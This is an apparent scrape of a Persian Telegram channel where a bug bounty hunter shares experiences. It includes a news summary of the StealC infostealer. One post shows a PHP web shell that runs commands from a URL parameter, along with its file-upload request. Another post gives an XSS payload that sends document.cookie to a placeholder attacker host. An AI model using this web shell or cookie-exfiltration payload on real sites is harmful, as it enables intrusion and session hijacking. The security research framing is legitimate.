Forwarded from +Ali
migmig.rar
684.2 KB
write-up with image
MigMig.txt
14.5 KB
Write-up without image
+Ali
migmig.rar
Write Up Challenge Yashar with name Mig-Mig and 7 Flags
This media is not supported in your browser
VIEW IN TELEGRAM
The New and Old Hero 🔥🪖
این دو دانشمند خیلی در ایران گمنام هستند.
Vint Cerf and Bob Kahn
این دو دانشمند به نوعی خالق TCP/IP و از طراحان شبکه اینترنت می باشند.
#خبر
Vint Cerf and Bob Kahn
این دو دانشمند به نوعی خالق TCP/IP و از طراحان شبکه اینترنت می باشند.
#خبر
تو ایران اینجوریه که من از منهای ۱۰۰ شروع میکنم و میرسم به ۹۰
و یکی با حمایت خانواده نمیگم رانت از ۸۵ شروع میکنه و میرسه به ۱۲۰
من ۱۹۰ پله طی کردم
اون ۳۵ پله
ولی جامعه ۱۲۰ رو میبینه
و من همچنان عقبم.
#تجربه
و یکی با حمایت خانواده نمیگم رانت از ۸۵ شروع میکنه و میرسه به ۱۲۰
من ۱۹۰ پله طی کردم
اون ۳۵ پله
ولی جامعه ۱۲۰ رو میبینه
و من همچنان عقبم.
#تجربه
🔴 نسخه ی دوم بدافزار معروف StealC با بهبود در مخفی کاری و سرقت داده منتشر شد.
محققای Zscaler نسخه ی 2.2.4 این بدافزار رو آنالیز و گزارشی در خصوصش منتشر کردن.
بدافزار StealC یک بدافزار سارق اطلاعات هستش که اوایل 2023 محبوب شد و با قیمت ماهانه 200 دلار در ماه فروخته میشد.
در کمپین های مختلفی ازش استفاده شده، مثلا در سال 2024 از طریق کمپین های تبلیغاتی مخرب توزیع شده بود. نکته جالب این بود که مهاجمین از حالت کیوسک (kiosk mode) مرورگر سوء استفاده کرده بودن. حالت کیوسک یک پیکربندی ویژه هستش که در مرورگرها یا برنامهها برای اجرا در حالت تمامصفحه بدون عناصر رابط کاربری استاندارد مانند نوار ابزار، نوار آدرس و ... استفاده میشه و برای محدود کردن تعامل کاربر به عملکردهای خاص طراحی شده و در کیوسکهای عمومی، پایانههای نمایشی و ... استفاده میشه. مهاجمین مرورگر کاربر رو به این حالت میبردن و صفحه ی لاگین گوگل رو نمایش میدادن. اصطلاحا روی این صفحه کاربر رو قفل میکردن. یسری از کلیدها مثل F11 و ESC هم کار نمیکرد. کاربر با وارد کردن اطلاعات لاگین از این حالت خارج شده و البته اطلاعات اعتبارنامه هاش رو هم به هکرها می فرستاد.
یک چیز جالب در خصوص این بدافزار دور زدن App-Bound Encryption کروم برای اکانتهای گوگل بود. این یک مکانیزم امنیتی هستش که توسط گوگل در مرورگر کروم پیادهسازی شد تا با رمزنگاری کوکی ها براساس دستگاه و کروم، از اونا در برابر سرقت محافظت کنه. این کار باعث میشه اگه بدافزاری کوکی رو بدزده، نتونه براحتی ازش در دستگاه یا برنامه دیگه استفاده کنه. StealC مکانیزمی داشت که میتونست کوکی های منقضی شده یا دزدیده شده رو بازسازی کنه.
نسخه ی 2 و بالاتر این بدافزار در مارس 2025 معرفی شده و شامل ویژگی های جدید زیر هستش:
- بهبود در پشتیبانی فایلهای مخرب EXE و MSI و اسکریپتهای پاورشل و فعال سازی پیلود رو میشه کنترل کرد.
- برای رشته ها و ارتباطات از RC4 و برای فرار بهتر در پاسخ C2 از پارامترهای تصادفی استفاده میکنه.
- بهبودهایی در اجرای پیلودها در سیستم های 64 بیتی و اجرای توابع API بصورت داینامیک در زمان اجرا داده و یک روال خود حذفی اضافه کرده.
- پشتیبانی از بات تلگرامی برای هشدار به اپراتورها
- ارائه ی یک بیلدر که امکان ساخت نسخه های جدید با قالب و رولهای دلخواه رو میده.
- میتونه از دسکتاپ با چندین مونیتور اسکرین شات بگیره.
علاوه بر این موارد، یسری موارد هم حذف شده از جمله دانلود و اجرای DLL و بررسی های AntiVM. احتمالا این کار برای سبکتر کردن بدافزار کردن یا در آینده میخوان با تکنیکهای بهتر بهبود بدن.
برای محافظت از داده هاتون در برابر بدافزارهای سارق اطلاعات، از ذخیره اطلاعات حساس در مرورگر برای راحتی خودداری کنید، از احراز هویت چندعاملی برای محافظت از حسابهاتون استفاده کنید و هرگز نرمافزارهای کرکشده یا دیگر نرمافزارها رو از منابع نامعتبر دانلود نکنید.
#خبر@Now_Republic_of_Humanity
محققای Zscaler نسخه ی 2.2.4 این بدافزار رو آنالیز و گزارشی در خصوصش منتشر کردن.
بدافزار StealC یک بدافزار سارق اطلاعات هستش که اوایل 2023 محبوب شد و با قیمت ماهانه 200 دلار در ماه فروخته میشد.
در کمپین های مختلفی ازش استفاده شده، مثلا در سال 2024 از طریق کمپین های تبلیغاتی مخرب توزیع شده بود. نکته جالب این بود که مهاجمین از حالت کیوسک (kiosk mode) مرورگر سوء استفاده کرده بودن. حالت کیوسک یک پیکربندی ویژه هستش که در مرورگرها یا برنامهها برای اجرا در حالت تمامصفحه بدون عناصر رابط کاربری استاندارد مانند نوار ابزار، نوار آدرس و ... استفاده میشه و برای محدود کردن تعامل کاربر به عملکردهای خاص طراحی شده و در کیوسکهای عمومی، پایانههای نمایشی و ... استفاده میشه. مهاجمین مرورگر کاربر رو به این حالت میبردن و صفحه ی لاگین گوگل رو نمایش میدادن. اصطلاحا روی این صفحه کاربر رو قفل میکردن. یسری از کلیدها مثل F11 و ESC هم کار نمیکرد. کاربر با وارد کردن اطلاعات لاگین از این حالت خارج شده و البته اطلاعات اعتبارنامه هاش رو هم به هکرها می فرستاد.
یک چیز جالب در خصوص این بدافزار دور زدن App-Bound Encryption کروم برای اکانتهای گوگل بود. این یک مکانیزم امنیتی هستش که توسط گوگل در مرورگر کروم پیادهسازی شد تا با رمزنگاری کوکی ها براساس دستگاه و کروم، از اونا در برابر سرقت محافظت کنه. این کار باعث میشه اگه بدافزاری کوکی رو بدزده، نتونه براحتی ازش در دستگاه یا برنامه دیگه استفاده کنه. StealC مکانیزمی داشت که میتونست کوکی های منقضی شده یا دزدیده شده رو بازسازی کنه.
نسخه ی 2 و بالاتر این بدافزار در مارس 2025 معرفی شده و شامل ویژگی های جدید زیر هستش:
- بهبود در پشتیبانی فایلهای مخرب EXE و MSI و اسکریپتهای پاورشل و فعال سازی پیلود رو میشه کنترل کرد.
- برای رشته ها و ارتباطات از RC4 و برای فرار بهتر در پاسخ C2 از پارامترهای تصادفی استفاده میکنه.
- بهبودهایی در اجرای پیلودها در سیستم های 64 بیتی و اجرای توابع API بصورت داینامیک در زمان اجرا داده و یک روال خود حذفی اضافه کرده.
- پشتیبانی از بات تلگرامی برای هشدار به اپراتورها
- ارائه ی یک بیلدر که امکان ساخت نسخه های جدید با قالب و رولهای دلخواه رو میده.
- میتونه از دسکتاپ با چندین مونیتور اسکرین شات بگیره.
علاوه بر این موارد، یسری موارد هم حذف شده از جمله دانلود و اجرای DLL و بررسی های AntiVM. احتمالا این کار برای سبکتر کردن بدافزار کردن یا در آینده میخوان با تکنیکهای بهتر بهبود بدن.
برای محافظت از داده هاتون در برابر بدافزارهای سارق اطلاعات، از ذخیره اطلاعات حساس در مرورگر برای راحتی خودداری کنید، از احراز هویت چندعاملی برای محافظت از حسابهاتون استفاده کنید و هرگز نرمافزارهای کرکشده یا دیگر نرمافزارها رو از منابع نامعتبر دانلود نکنید.
#خبر@Now_Republic_of_Humanity
This media is not supported in your browser
VIEW IN TELEGRAM
🥷Grow up like a ninja on the life🔥
حدودا دو ماه شده که دست به سیستم نزدم که دور باشم از فضاش به دلایلی و از طرفیم غرق شده بودم توی دنیای امنیت به طوری که کل روزم میرفت روش برا همین نیازه که بیای عقب و درمورد راهی که رفتی تامل کنی ولی راه و چاه جدیدی در پیشه جمعه روز رویایی میشه!
ما داریم میایم، صبر کن تا آسیبپذیریهای جدید رو رو کنیم... به زودی همدیگه رو میبینیم!
We're on our way, so hold tight until new vulnerabilities are revealed... See you soon!
Nous sommes en route, alors accrochez-vous jusqu'à ce que de nouvelles vulnérabilités soient révélées... À bientôt !
Siamo in cammino, quindi tenetevi forte fino a quando non verranno rivelate nuove vulnerabilità... A presto!
#سرگرمی
ما داریم میایم، صبر کن تا آسیبپذیریهای جدید رو رو کنیم... به زودی همدیگه رو میبینیم!
We're on our way, so hold tight until new vulnerabilities are revealed... See you soon!
Nous sommes en route, alors accrochez-vous jusqu'à ce que de nouvelles vulnérabilités soient révélées... À bientôt !
Siamo in cammino, quindi tenetevi forte fino a quando non verranno rivelate nuove vulnerabilità... A presto!
#سرگرمی
توی ایران یکی از عجیب ترین چیزایی که دیدم این بود به یه وبسایتی زنگ زدم گفتم با تیم فنی میخوام صحبت بکنم و اینا بعد یه خانومی گرفتن و گفتن که تیم فنی هستن
من میگفتم برنامه باگ بانتی دارید؟ اینقدر کلمه براش عجیب بود که میگفت برنامه بار بندی؟ بعد من میگفتم نه باگ بانتی تست نفوذ و امنیت
اینقدر پرت بود دقت کنین تیم فنی وبسایت بوده ها ادمین فروش نبوده ادمین تیم فنی وبسایت بود
واقعا سخته توی ایران زندگی کردن و کار کردن
#تجربه
من میگفتم برنامه باگ بانتی دارید؟ اینقدر کلمه براش عجیب بود که میگفت برنامه بار بندی؟ بعد من میگفتم نه باگ بانتی تست نفوذ و امنیت
اینقدر پرت بود دقت کنین تیم فنی وبسایت بوده ها ادمین فروش نبوده ادمین تیم فنی وبسایت بود
واقعا سخته توی ایران زندگی کردن و کار کردن
#تجربه
توی حوزه باگ بانتی یه سری باگ کشف کردم که حالا نکاتی رو درموردشون بهتون میگم برای مثال خیلی از باگ هایی که زدم درمورد injection ها با پیلود های ساده خورده مثلا آخرین PHP Code Injection که زدم ز طریق پیلود زیر بود که قشنگ میزارم چی به چی شده بود
سورس کد فایل php که لود کردم این بود:
و از طرفیم نحوه ارسال فایل برای وبسرور هم اینطوری بود توی درخواست
ببینین خیلی سادس واقعا و همه میزنن ولی تارگتی که روش اینو زدن 3 تا تیم 9 نفره روش کار کردن و البته که من خودم این تارگت رو به 5 نفر هم معرفی کردم ولی ببینین چه آسیب پذیری از دستشون در رفته!
همیشه تمرکز کنین رو کارتون نتیجه میگیرن .
#تجربه
سورس کد فایل php که لود کردم این بود:
<?php
if (isset($_GET['cmd'])) {
echo "<pre>" . shell_exec($_GET['cmd']) . "</pre>";
}
?>
و از طرفیم نحوه ارسال فایل برای وبسرور هم اینطوری بود توی درخواست
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:138.0) Gecko/20100101 Firefox/138.0
Content-Type: multipart/form-data; boundary=----geckoformboundary683826c298dd095893993392f828c5e3
Content-Length: 898
Origin: https://example.com
Referer: https://example.com
------geckoformboundary683826c298dd095893993392f828c5e3
Content-Disposition: form-data; name="logo_company"; filename="888.php"
Content-Type: application/x-php
<h1>Test POC PHP Code Injection</h1>
<?php
phpinfo();
?>
------geckoformboundary683826c298dd095893993392f828c5e3
Content-Disposition: form-data; name="_token"
JifO7swkwISR0bG8RjlIcXPv3Gulhv9Hm8hWWYed
------geckoformboundary683826c298dd095893993392f828c5e3
Content-Disposition: form-data; name="_method"
PATCH
------geckoformboundary683826c298dd095893993392f828c5e3
Content-Disposition: form-data; name="name"
test
------geckoformboundary683826c298dd095893993392f828c5e3
Content-Disposition: form-data; name="username"
tes-bugbouty
------geckoformboundary683826c298dd095893993392f828c5e3
Content-Disposition: form-data; name="denoscription"
Test
------geckoformboundary683826c298dd095893993392f828c5e3--
ببینین خیلی سادس واقعا و همه میزنن ولی تارگتی که روش اینو زدن 3 تا تیم 9 نفره روش کار کردن و البته که من خودم این تارگت رو به 5 نفر هم معرفی کردم ولی ببینین چه آسیب پذیری از دستشون در رفته!
همیشه تمرکز کنین رو کارتون نتیجه میگیرن .
#تجربه
توی یه پلتفرم معروف ایرانی کار میکردم تا اون موقع باگی که تریاژ شده باشه + بانتیشم واریز شده باشه نزده بودم قبلش باگ زده بودم چندتا ولی پیچوندن و 2.5 قرار بود بدن و ندادن ، توی پلتفرم که شروع به کار کردم دیدم یه وبسایت تازه اومده بالا تارگت نیو و تازه ای بود و اپدیت داده بود روی وبسایتش
منم با شوق و ذوق که جزو اولین هانترام میرم روش رفتم هانت روش
یه باگی زدم از یه جایی که نیاز داشت سورس تمامی صفحه های سایت رو بخونی ، یکی از برنامه نویسا توی یکی از مسیر ها به نام `kids/`یه سورس جاوا اسکریپت گذاشته بود که مربوط میشد به لود کردن تصاویر که میتونست از پارامتر هم مقدار دهی بشه
رفتم تو کارش بعد 1 ساعت بوم اولین باگ خفن اونم توی پلتفرم اونم راورو در رقابت با خوبای هانت یه باگ زدم XSS زدم گفتم تا اینجا که اومدم بزار تست بگیرم ببینم میتونم حساسیت آسیب پذیری رو ببرم بالا یا که نه (اینطوری بودم که فعععععععععععکک نعععععععععععععکنم ) که با دیدگاه منفی رفتم توش و دیدم از طریق جاوا اسکریپت میتونم کوکی رو آلرت کنم
سریع یه اسکریپت یه خطی نوشتم که کوکی رو بگیره و برای سایت هکر بفرسته !
اون پیلود اینه:
بعد از اون هر وقت باگ XSS میزنم آلرت میاد بالا اول اینو میندازم ببینم درخواست میاد رو سرورم یانه شمام نگهش دارین خیلی جوابه ، البته بدونید که وقتی درخواست نمیاد یا کوکی رو نمیفرسته برین دنبال دلیلش نشه 5 ساعت وقت بزارین فکر کنین پیلود خرابه بعد ببینین نه توی کوکی ها HttpOnly اون کوکی که تو میخای true هست!
#تجربه
منم با شوق و ذوق که جزو اولین هانترام میرم روش رفتم هانت روش
یه باگی زدم از یه جایی که نیاز داشت سورس تمامی صفحه های سایت رو بخونی ، یکی از برنامه نویسا توی یکی از مسیر ها به نام `kids/`یه سورس جاوا اسکریپت گذاشته بود که مربوط میشد به لود کردن تصاویر که میتونست از پارامتر هم مقدار دهی بشه
رفتم تو کارش بعد 1 ساعت بوم اولین باگ خفن اونم توی پلتفرم اونم راورو در رقابت با خوبای هانت یه باگ زدم XSS زدم گفتم تا اینجا که اومدم بزار تست بگیرم ببینم میتونم حساسیت آسیب پذیری رو ببرم بالا یا که نه (اینطوری بودم که فعععععععععععکک نعععععععععععععکنم ) که با دیدگاه منفی رفتم توش و دیدم از طریق جاوا اسکریپت میتونم کوکی رو آلرت کنم
سریع یه اسکریپت یه خطی نوشتم که کوکی رو بگیره و برای سایت هکر بفرسته !
اون پیلود اینه:
<noscript> var xhr = new XMLHttpRequest(); xhr.open("POST", "https://HACKER-SITE.com", true); xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); xhr.send(document.cookie); </noscript>بعد از اون هر وقت باگ XSS میزنم آلرت میاد بالا اول اینو میندازم ببینم درخواست میاد رو سرورم یانه شمام نگهش دارین خیلی جوابه ، البته بدونید که وقتی درخواست نمیاد یا کوکی رو نمیفرسته برین دنبال دلیلش نشه 5 ساعت وقت بزارین فکر کنین پیلود خرابه بعد ببینین نه توی کوکی ها HttpOnly اون کوکی که تو میخای true هست!
#تجربه
توی حوزه باگ بانتی ایران
بعضی شرکت ها هستن که اولی که میری برا هماهنگی و باگ هانتینگ ازت استقبال میشه خوشحال و خوشآمدید و اینا
باگ رو گزارش میدی
سین میکنن جواب نمیده
مثل یکی از باگ هایی که html injection که از یکی از سایت های ایران با خدمات کیف پول زدم 3 ماهه سین میکنه جواب نمیده!
نمیدونم اینا چطور سرشونو رو بالش میزارن وقتی بدهکارن و مال مردم رو عین آب خوردن میخورن
باگ رو پچ کردن! ولی سین میکنه جوابتو نمیده
دراین حد وقاحت دارن بعضی وبسایت ها
در عوضش بعضی وبسایت ها هستن کوچیکن یعنی خدمات خاصی هم نمیدن ولی اینقدر خوب برخورد میکنن که میگی اصلا بزار برا اینا رایگان کار کنم فقط با اینا حرف بزنم
این کجا و آن کجا
#تجربه
بعضی شرکت ها هستن که اولی که میری برا هماهنگی و باگ هانتینگ ازت استقبال میشه خوشحال و خوشآمدید و اینا
باگ رو گزارش میدی
سین میکنن جواب نمیده
مثل یکی از باگ هایی که html injection که از یکی از سایت های ایران با خدمات کیف پول زدم 3 ماهه سین میکنه جواب نمیده!
نمیدونم اینا چطور سرشونو رو بالش میزارن وقتی بدهکارن و مال مردم رو عین آب خوردن میخورن
باگ رو پچ کردن! ولی سین میکنه جوابتو نمیده
دراین حد وقاحت دارن بعضی وبسایت ها
در عوضش بعضی وبسایت ها هستن کوچیکن یعنی خدمات خاصی هم نمیدن ولی اینقدر خوب برخورد میکنن که میگی اصلا بزار برا اینا رایگان کار کنم فقط با اینا حرف بزنم
این کجا و آن کجا
#تجربه
This media is not supported in your browser
VIEW IN TELEGRAM
Trendy stuff is usually pointless and kinda dumb. Just know your worth and make the most of it. Grow strong, like tree roots deep in the soil.🔥💪
یعنی وقتی که میرم میبینم از یه قسمت تیکت فقط 15 تا تست کیس میتونم بزنم
عشق میکنم اصلا
اون تارگت رو اون پروگرام رو روی چشمام میزارم 😂 از این تارگتا کمن تو ایران
#سرگرمی
عشق میکنم اصلا
اون تارگت رو اون پروگرام رو روی چشمام میزارم 😂 از این تارگتا کمن تو ایران
#سرگرمی
This media is not supported in your browser
VIEW IN TELEGRAM
یه PII تمیز + اکسپلویت بش
که کاربرا رو اطلاعاتشون رو لیک کنه
از این باگا بزنین لذت میده ❤️
ویدئوی آموزشی این یه آسیب پذیری مخصوصا توی ایران رو میگیرم میزارم توی کانال چون که توی دو تا سایت بزرگ ایرانی خورده این آسیب پذیری و هردو قبول کردن!
#تجربه
که کاربرا رو اطلاعاتشون رو لیک کنه
از این باگا بزنین لذت میده ❤️
ویدئوی آموزشی این یه آسیب پذیری مخصوصا توی ایران رو میگیرم میزارم توی کانال چون که توی دو تا سایت بزرگ ایرانی خورده این آسیب پذیری و هردو قبول کردن!
#تجربه
جدیدا خیلی از آسیب پذیری های خوبی که میخورن سمت باگ های لاجیک هستند، از طرفیم باگ های لاجیک به بررسی کردن نیاز داره و البته تجربه نیاز داره در نتیجه کمتر کسی میتونه بزنه
باگ بزنین، باگ لاجیک بزنین ❤️
باگ بزنین، باگ لاجیک بزنین ❤️
یه آسیب پذیری Low هست که اکثر وبسایت های ایرانی رو در بر میگیره عنوان آسیب پذیری رو برای اینکه متوجه بشید میگیم ویو فیک زدن مقالات ولی برای اینکه گزارش مون تر تمیز تر باشه میزنیم
شکستن فانکشن و یا بایپس کردن فانکشن ویو مقالات
این خیلی راحته یه کد جاوا اسکریپت رو میزاری توی کنسوله صفحه مقالات میتونی خیلی راحت تست بگیری و حتی اگر CDN هم داشت میتونید بایپس کنید یا طوری تست کنید که CDN نگیره اونو
کدشم میزارم براتون پایین تر
#تجربه
شکستن فانکشن و یا بایپس کردن فانکشن ویو مقالات
این خیلی راحته یه کد جاوا اسکریپت رو میزاری توی کنسوله صفحه مقالات میتونی خیلی راحت تست بگیری و حتی اگر CDN هم داشت میتونید بایپس کنید یا طوری تست کنید که CDN نگیره اونو
کدشم میزارم براتون پایین تر
#تجربه